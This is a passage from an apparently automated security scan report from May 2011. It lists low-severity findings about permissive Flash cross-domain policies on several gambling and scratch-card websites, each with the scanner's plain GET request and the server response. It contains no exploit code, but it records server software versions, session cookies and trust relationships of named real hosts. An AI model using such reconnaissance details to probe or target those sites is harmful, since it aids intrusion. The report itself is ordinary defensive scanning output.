Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xkmxm445qmndxh3rwx1ohgm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.42. http://da.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://da.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: da.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b2kkxkynjn03ii3ktrw0ah55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.43. http://da.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://da.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: da.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:18 GMT
Accept-Ranges: bytes
ETag: "7c4663cf47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:56 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.44. http://da.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://da.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: da.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ozyfv2jniwov5p55hdjmeu45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.45. http://da.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://da.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: da.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=whxbooqaqnnlxub0dxcbm245; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.46. http://da.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://da.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: da.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uazqnomqt2gc1w45rkqvqkfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.47. http://de.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: de.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lx0lck2lrksjyv551wrczxa1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.48. http://de.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: de.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:23 GMT
Accept-Ranges: bytes
ETag: "5e4890d247b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:27 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.49. http://de.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: de.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4nrvlj45ijqie445hynujq45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.50. http://de.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: de.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5jyo2ey3yspzg2ap4zo1wl55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.51. http://de.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://de.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: de.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rwwxva554b3fkwmcpmdaxo55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.52. http://download.neogames-tech.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://download.neogames-tech.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 1044
Content-Type: text/xml
Last-Modified: Wed, 02 Mar 2011 10:58:07 GMT
Accept-Ranges: bytes
ETag: "f67924b6c8d8cb1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:37:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*.karamba.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogamespartners.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.dev.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.extraspel.com" secure="false"/>
...[SNIP]...

4.53. https://download.neogames-tech.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://download.neogames-tech.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 1044
Content-Type: text/xml
Last-Modified: Wed, 02 Mar 2011 10:58:07 GMT
Accept-Ranges: bytes
ETag: "f67924b6c8d8cb1:b9f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:00:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*.karamba.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.neogamespartners.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.dev.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.slotsandgames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.netticasino.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.extraspel.com" secure="false"/>
...[SNIP]...

4.54. http://el.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://el.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: el.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:34 GMT
Accept-Ranges: bytes
ETag: "9e74d2d847b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:40 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.55. http://el.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://el.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: el.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4bwq4n55k3pmm345mmyc3kjc; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.56. http://en.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w44eyu3feh3zfsna0zpz0a45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.57. http://en.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:47:43 GMT
Accept-Ranges: bytes
ETag: "a2051de47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:29 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.58. http://en.info.winnings.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://en.info.winnings.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.info.winnings.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4xy3rcjg2enutcfs23krou55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
